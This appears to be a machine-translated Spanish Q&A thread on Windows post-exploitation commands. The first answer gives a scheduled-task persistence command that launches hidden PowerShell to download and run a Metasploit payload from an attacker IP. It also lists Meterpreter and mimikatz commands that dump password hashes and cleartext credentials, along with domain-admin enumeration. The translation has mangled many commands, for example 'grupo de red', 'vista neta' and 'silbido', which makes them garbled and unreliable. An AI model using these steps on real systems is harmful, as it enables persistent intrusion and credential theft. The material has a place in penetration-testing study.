Seguridad de la información: ¿Cuáles son los comandos más utilizados durante la fase posterior a la explotación (como administrador) en la línea de comandos de Windows (cmd.exe)?

Gran pregunta! Una vez que haya obtenido acceso de shell a un sistema (Windows), volveré a la fase de reconocimiento e investigaré el entorno interno. Las cosas principales que buscaré son:

  1. Un método para mantener el acceso (persistencia).
  2. Nombres / nombres de usuario de administradores y administradores de dominio.
  3. Nombres de sistemas cercanos para futuros ataques.
  4. Credenciales adicionales

Mantenimiento del acceso : una forma fácil de mantener el acceso es registrando una tarea programada que inicia una conexión de meterpreter a mi servidor de ataque cada 30 minutos:

  schtasks.exe / Crear / F / SC minuto / mes 30 / TN "MyPenetrationTest" / RU "SYSTEM" / TR "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient) .downloadstring (' '' http://10.10.0.10/wdflkjw '' ')) "

El comando anterior inicia una carga útil de Metasploit web_delivery y me dará acceso si falla mi acceso inicial.

2. Usuarios administradores : para descubrir quiénes son los administradores de dominio, puede usar el siguiente comando:

  grupo de red "Administradores de dominio" / Dominio

Lo mismo se aplica a otros grupos de interés. Para buscar otros grupos, ejecute:

  grupo neto

3. Sistemas cercanos : una forma rápida de encontrar sistemas cercanos en un entorno de Microsoft es mediante el siguiente comando:

  vista neta

Puede ser útil ver qué sistemas se están conectando al sistema comprometido. Una forma de ver esa información es ejecutando:

  netstat -an

Tener una lista de sistemas cercanos puede reducir el tiempo requerido para encontrar el siguiente sistema al que desea apuntar. Esto es especialmente cierto si la convención de nomenclatura de la organización de destino incluye la función del sistema en el nombre de host.

4. Contraseñas adicionales : si bien estos no son comandos cmd.exe, casi siempre uso la línea de comandos de Meterpreter para extraer contraseñas de la memoria. Aquí están los comandos que uso:

  getsystem # Intentos para elevar a los privilegios del sistema
 hashdump #Vuelca hash de contraseña para cuentas locales
 cargar mimikatz # Carga mimikatz en meterpreter
 livessp #Vuelca las contraseñas de livessp
 msv #Vuelca las contraseñas de msv
 kerberos #Vuelca las contraseñas de kerberos
 wdigest #dumps wdigest contraseñas

Además, puede buscar / sysvol compartir en el controlador de dominio para las secuencias de comandos de directiva de grupo. Los scripts ubicados allí pueden contener contraseñas adicionales u otras gemas ocultas. 🙂

¡Póngase en contacto si tiene alguna pregunta! 🙂

Depende de muchos factores, principalmente quizás de los siguientes 2 factores
1. El motivo del Hacker o Pen-tester, ya sea que busquen exfiltración de datos o mayor acceso a la red o para realizar pruebas o simplemente por diversión.
2. Rol del servidor, por ejemplo, si es un servidor de puerta de enlace o un servidor de correo electrónico o servidor de archivos, etc.

Algunos de los comandos comunes en Windows serían:

quién soy
ipconfig
netstat
dir
silbido
tracert

Estos comandos se pueden usar con fines de enumeración:
ipconfig / all
inicio neto
lista de tareas / v
usuario de red
administradores de grupos locales netos
netstat -ano
uso neto
vista neta

Es mejor guardar la salida en un archivo de texto para que sea más fácil de interpretar.